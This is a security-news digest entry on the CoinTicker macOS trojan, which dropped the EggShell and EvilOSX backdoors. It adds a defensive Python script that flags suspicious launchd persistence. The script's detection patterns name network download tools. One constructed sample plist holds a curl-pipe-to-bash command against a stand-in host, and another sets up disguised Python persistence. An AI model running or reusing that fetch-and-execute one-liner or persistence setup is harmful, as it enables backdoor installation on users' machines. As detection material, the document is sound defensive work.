Mac CryptoCurrency Ticker App Installs Backdoors (Oct 29, 2018)
A Malwarebytes forum user informed the company's researchers of a malicious macOS application, masquerading as a cryptocurrency price checker, that they had discovered. The application, called "CoinTicker," does work as advertised, showing current prices for various cryptocurrencies, but on launch it also attempts to install two different backdoors on the host. When run, CoinTicker downloads and installs two publicly available, open-source backdoors, "EggShell" and "EvilOSX." Because both are open source, their capabilities are relatively flexible: threat actors can modify them to fit their needs. The working ticker is what makes the trojan effective, since a user who sees the advertised function has no reason to look for anything else running on the machine.
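The practical check for this kind of trojanized app is to look for what the dropped backdoors leave behind. Python backdoors of the EggShell and EvilOSX type typically persist as a user LaunchAgent that runs an interpreter on a script tucked into a hidden directory, or as a shell one-liner that fetches a stage from the network. The script below, an added example written for this digest and not Malwarebytes' or the backdoor authors' code, parses launchd plists and flags jobs with those traits. The sample plists, their labels, and their paths are constructed for illustration; they are not indicators from the CoinTicker case, and the heuristics produce leads to review, not verdicts.

```python
"""Audit launchd job plists for the persistence shape a dropped Python
backdoor tends to install: an interpreter run on a script in a hidden or
temp path, or a shell -c one-liner that downloads or decodes code.

Added example for this digest; not Malwarebytes' or the backdoor authors'
code. SAMPLE_PLISTS below are constructed; labels and paths are illustrative,
not indicators from the CoinTicker case."""
import plistlib
import re
from pathlib import Path

# Interpreters a legitimate LaunchAgent rarely executes directly.
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh",
                "osascript", "perl", "ruby"}
# Tools that pull or decode a payload inside an inline shell command.
DOWNLOADERS = re.compile(r"\b(curl|wget|nc|nscurl)\b|base64\s+(-d|-D|--decode)")
# Hidden directories/files and temp locations are favoured drop sites.
HIDDEN_OR_TEMP = re.compile(r"/\.[^/]+(/|$)|^/(private/)?(tmp|var/tmp)/")


def program_args(job: dict) -> list:
    """Effective command line of a launchd job (ProgramArguments wins over Program)."""
    if job.get("ProgramArguments"):
        return [str(a) for a in job["ProgramArguments"]]
    if job.get("Program"):
        return [str(job["Program"])]
    return []


def score_job(job: dict) -> list:
    """Reasons a job looks like dropped-backdoor persistence; [] means no signal."""
    args = program_args(job)
    if not args:
        return []
    reasons = []
    exe = Path(args[0]).name
    if exe in INTERPRETERS:
        reasons.append(f"runs interpreter directly: {exe}")
    hidden = [a for a in args if HIDDEN_OR_TEMP.search(a)]
    if hidden:
        reasons.append(f"references hidden or temp path: {hidden[0]}")
    if "-c" in args[1:] and DOWNLOADERS.search(" ".join(args[1:])):
        reasons.append("inline shell command downloads or decodes code")
    label = str(job.get("Label", ""))
    if reasons and label.startswith("com.apple."):
        reasons.append(f"Apple-looking label on a user-installed job: {label}")
    if reasons and job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad with KeepAlive: restarts if killed")
    return reasons


def audit_plists(plists: dict) -> dict:
    """plists: path -> raw plist bytes. Returns path -> reasons for flagged jobs."""
    findings = {}
    for path, raw in plists.items():
        try:
            job = plistlib.loads(raw)
        except Exception:  # not XML/binary plist, or malformed
            findings[path] = ["unparseable plist"]
            continue
        reasons = score_job(job)
        if reasons:
            findings[path] = reasons
    return findings


def read_launch_agents(home: Path = Path.home()) -> dict:
    """Collect ~/Library/LaunchAgents/*.plist on a real Mac (empty elsewhere)."""
    agents = home / "Library" / "LaunchAgents"
    if not agents.is_dir():
        return {}
    return {str(p): p.read_bytes() for p in agents.glob("*.plist")}


# Constructed sample jobs (not real IOCs), serialized as XML plists.
SAMPLE_PLISTS = {
    "/Users/alice/Library/LaunchAgents/com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
        "RunAtLoad": True,
    }),
    "/Users/alice/Library/LaunchAgents/com.apple.helper.plist": plistlib.dumps({
        "Label": "com.apple.helper",
        "ProgramArguments": ["/usr/bin/python", "/Users/alice/Library/.cache/agent.py"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "/Users/alice/Library/LaunchAgents/com.example.sync.plist": plistlib.dumps({
        "Label": "com.example.sync",
        "ProgramArguments": ["/bin/bash", "-c", "curl -s http://example.invalid/stage2.sh | bash"],
        "RunAtLoad": True,
    }),
}

if __name__ == "__main__":
    for path, reasons in audit_plists({**SAMPLE_PLISTS, **read_launch_agents()}).items():
        print(path)
        for r in reasons:
            print("   -", r)
```

Run it on a Mac and it appends the real contents of ~/Library/LaunchAgents to the constructed samples; extend read_launch_agents to /Library/LaunchAgents and /Library/LaunchDaemons if you want system-wide coverage, which needs root to read some daemon plists. A hit on a hidden path alone is weak (dotfile-based tools such as shell version managers legitimately live there); the combination of interpreter, hidden path, an Apple-looking label and KeepAlive is what should get the host pulled for a closer look.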
Recommendation: Malwarebytes researchers note that, at the time of writing, CoinTicker has stopped functioning. The case nevertheless illustrates the risk that comes with downloading applications, particularly free ones. Users should be cautious when downloading applications, review the user feedback on the application, and scrutinize the permissions it requests when installed or first run. Your company should have policies in place defining which applications are permissible on work machines, to keep the risk as low as possible.
Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.